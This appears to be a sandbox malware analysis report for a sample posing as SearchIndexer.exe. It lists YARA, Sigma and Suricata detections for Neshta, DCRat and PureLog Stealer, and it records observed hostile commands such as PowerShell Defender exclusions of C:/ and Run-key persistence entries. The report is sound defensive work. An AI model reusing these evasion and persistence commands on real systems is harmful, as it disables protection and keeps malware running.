C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
Click to see the 315 entries

Memory Dumps

Source	Rule	Description	Author
00000001.00000000.1712832866.0000000000A62000.00000002.00000001.01000000.00000005.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000003.1708339397.0000000002230000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000034.00000002.2186722542.0000000000409000.00000004.00000001.01000000.00000008.sdmp	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
00000000.00000002.2762934153.0000000000409000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
00000001.00000002.2127156307.00000000132DA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: SearchIndexer.exe PID: 6636	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
Process Memory Space: SearchIndexer.exe PID: 3168	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: tAVtSoJGTaCxrZiXcJn.exe PID: 8740	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: svchost.com PID: 9192	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.SearchIndexer.exe.400000.0.unpack	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
0.0.SearchIndexer.exe.400000.0.unpack	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
1.0.SearchIndexer.exe.a60000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
1.0.SearchIndexer.exe.a60000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\SearchIndexer.exe, ProcessId: 6636, TargetFilename: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe, ProcessId: 3168, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchIndexer

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe, ParentProcessId: 3168, ParentProcessName: SearchIndexer.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 4548, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe, ParentProcessId: 3168, ParentProcessName: SearchIndexer.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe', ProcessId: 7404, ProcessName: powershell.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\PROGRA~1\WI8A19~1\RUNTIM~1.EXE, CommandLine: C:\PROGRA~1\WI8A19~1\RUNTIM~1.EXE, CommandLine|base64offset|contains: , Image: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe, NewProcessName: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe, OriginalFileName: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe, ParentCommandLine: "C:\Windows\svchost.com" "C:\PROGRA~1\WI8A19~1\RUNTIM~1.EXE" , ParentImage: C:\Windows\svchost.com, ParentProcessId: 9192, ParentProcessName: svchost.com, ProcessCommandLine: C:\PROGRA~1\WI8A19~1\RUNTIM~1.EXE, ProcessId: 9180, ProcessName: RuntimeBroker.exe

Sigma detected: Classes Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\svchost.com "%1" %*, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SearchIndexer.exe, ProcessId: 6636, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\(Default)

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Windows\Provisioning\Packages\tAVtSoJGTaCxrZiXcJn.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe, ProcessId: 3168, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tAVtSoJGTaCxrZiXcJn

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Windows\Provisioning\Packages\tAVtSoJGTaCxrZiXcJn.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe, ProcessId: 3168, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qhmtfwmp\qhmtfwmp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qhmtfwmp\qhmtfwmp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe, ParentProcessId: 3168, ParentProcessName: SearchIndexer.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qhmtfwmp\qhmtfwmp.cmdline", ProcessId: 4320, ProcessName: csc.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Unusual Parent Process For Cmd.EXE

Source: Process started

Author: Tim Rauch: Data: Command: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3vTESgZFSf.bat" , CommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3vTESgZFSf.bat" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe, ParentProcessId: 3168, ParentProcessName: SearchIndexer.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3vTESgZFSf.bat" , ProcessId: 7956, ProcessName: cmd.exe

Sigma detected: Use NTFS Short Name in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\svchost.com" "C:\PROGRA~2\WI7A8C~1\TAVTSO~1.EXE" , CommandLine: "C:\Windows\svchost.com" "C:\PROGRA~2\WI7A8C~1\TAVTSO~1.EXE" , CommandLine|base64offset|contains: , Image: C:\Windows\svchost.com, NewProcessName: C:\Windows\svchost.com, OriginalFileName: C:\Windows\svchost.com, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\svchost.com" "C:\PROGRA~2\WI7A8C~1\TAVTSO~1.EXE" , ProcessId: 7320, ProcessName: svchost.com

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\svchost.com" "C:\PROGRA~2\WI7A8C~1\TAVTSO~1.EXE" , CommandLine: "C:\Windows\svchost.com" "C:\PROGRA~2\WI7A8C~1\TAVTSO~1.EXE" , CommandLine|base64offset|contains: , Image: C:\Windows\svchost.com, NewProcessName: C:\Windows\svchost.com, OriginalFileName: C:\Windows\svchost.com, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\svchost.com" "C:\PROGRA~2\WI7A8C~1\TAVTSO~1.EXE" , ProcessId: 7320, ProcessName: svchost.com

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe, ProcessId: 3168, TargetFilename: C:\Users\user\AppData\Local\Temp\qhmtfwmp\qhmtfwmp.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe, ParentProcessId: 3168, ParentProcessName: SearchIndexer.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 4548, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 9036, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qhmtfwmp\qhmtfwmp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qhmtfwmp\qhmtfwmp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe, ParentProcessId: 3168, ParentProcessName: SearchIndexer.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qhmtfwmp\qhmtfwmp.cmdline", ProcessId: 4320, ProcessName: csc.exe

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T13:10:50.334984+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49736	37.44.238.250	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SearchIndexer.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe	Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe	Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe	Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE	Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Avira: detection malicious, Label: W32/Neshta.A
